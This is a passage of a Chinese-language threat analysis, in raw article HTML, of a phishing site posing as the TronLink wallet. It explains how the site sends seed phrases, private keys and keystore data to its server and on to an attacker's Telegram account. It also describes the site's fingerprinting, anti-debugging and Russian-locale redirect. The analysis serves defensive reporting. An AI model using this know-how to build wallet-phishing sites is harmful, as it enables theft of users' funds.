PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该站点是一个基于 Next.js 构建的单页应用。页面标题、UI 文案和布局均伪装为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TronLink Wallet</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，外观上与官方 TronLink 网页钱包高度一致，普通用户难以通过视觉分辨真伪。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.2332695984703632" data-type="png" data-w="523" height="645" style="margin-left: 0px;margin-top: 0px;" width="523" data-imgfileid="100021250" src="https://wechat2rss.xlab.app/img-proxy/?k=06ef82cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCICLftqWsib5SWcG2F6K0picsZxem55IuXWhgNIVeGVSPIToBrVFDQdaZnj0QicXFz6iayB63cic5ukBict6zyToiaCUOUNmuQwLAGYbs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">凭据窃取机制</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">站点在钱包导入流程中嵌入多层敏感信息收集逻辑：</span></span></p><ol class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">用户选择&#34;导入助记词&#34;&#34;导入私钥&#34;或&#34;导入 keystore 文件&#34;时，前端代码调用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">sendWords(...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 函数。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">sendWords(...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 将收集到的钱包助记词、私钥、keystore 文件内容等敏感数据打包为 JSON，通过 POST 请求发送到同源接口 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/api/data/words</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，服务端随后将这些凭据通过 Telegram Bot API 实时转发至攻击者控制的账号 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">chat_id: 8334454422</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li></ol><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4305555555555556" data-type="png" data-w="1080" height="259" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021254" src="https://wechat2rss.xlab.app/img-proxy/?k=7f8b2fd8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLR4Vu0PeB8uolrzJ26QUtgOuN5GumIogDFUGNUdicnRwBooLKXYbW7aJ9jlzBEjAYz3zZqCGzy6LJJbibib22pJmVrsyo0T9vzc8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8" data-type="png" data-w="1080" height="481" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021257" src="https://wechat2rss.xlab.app/img-proxy/?k=35386e64&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKmhvL1fUb3GfL8MYMduEq6Up1AUlr2JJnBRn7UvXQH6zPOpBnpwVRcdXWsEtoGDXLFeqZb5ZyxzVlBkqID1fLFe1rMjXzZZwI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.18796296296296297" data-type="png" data-w="1080" height="113" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021255" src="https://wechat2rss.xlab.app/img-proxy/?k=fdb5dcd5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJiaibSzWoGhBt3JfliayvM9eHYxIvjoxumJLzNibu4tJhXTxpYsQhfdnB1tUlHouD2ESBIo5icsPqE8UJpm6sFWsIL5JrxVfF765dU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.34444444444444444" data-type="png" data-w="1080" height="207" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021256" src="https://wechat2rss.xlab.app/img-proxy/?k=a981e3ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKmmUoicgpSwdFJSzPv3mVaFSCJErtOoYCpib4t2vjRciak8R0wbQ1HWdfqcWG8SkyqCsyiciaBIcl2GYHQ1002jI8JX3cT9ZOghLfU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><ol class="list-paddingleft-1" start="3"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">生成新钱包时，代码通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">trackEvent(&#34;Generated mnemonic: ...&#34;)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 方式记录生成的助记词。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">导入流程中的 keystore 密码和导入密码也会通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">trackEvent(...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 函数记录。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">多签钱包验证弹窗会要求用户输入&#34;authority address&#34;的助记词或私钥，并同样通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">sendWords(...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 上报。</span></span></p></li></ol><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">访问者追踪与封禁</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该站点实现了完善的访问者识别和反分析机制：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">客户端 JS 读取 Cookie </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_vb</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 和 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_vid</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 用于访问者标识。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/api/visitor/enrich</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 和 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/api/visitor/sync</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 接口进行封禁检查，命中封禁后页面会跳转至 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">about:blank</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，此举旨在阻断自动化沙箱爬取或安全研究员的动态调试，使被识别为分析环境的访问无法观察到真实的钓鱼界面。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">用户行为和敏感事件通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">trackEvent(...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 上报到 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/api/visitor/track</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">反分析手段</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">页面包含多重反分析逻辑：禁用右键菜单、禁用文本选择、拦截 F12 和 DevTools 快捷键、清空浏览器 console、禁止拖拽操作、禁止打印。这些措施增加了安全研究人员对其进行分析取证的难度。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7046296296296296" data-type="png" data-w="1080" height="388" style="margin-left: 0px;margin-top: 0px;" width="550" data-imgfileid="100021258" src="https://wechat2rss.xlab.app/img-proxy/?k=9ba892bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCKdsHS0znZux6svC1VI87TXRI2HzHJbdWNqAGwAHY7sfAInN0icoVNn3oFIVf6iboklORoHAXl9NU621kV2icEj0GZSib06vmcwOBE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地域定向分流</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码中包含地域判断逻辑：当检测到俄语浏览器语言或俄罗斯相关时区的用户时，页面会自动重定向至 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">trx-scan-explorer.org</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，表明攻击者可能对特定地区用户采取不同的钓鱼策略或规避当地执法关注。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: 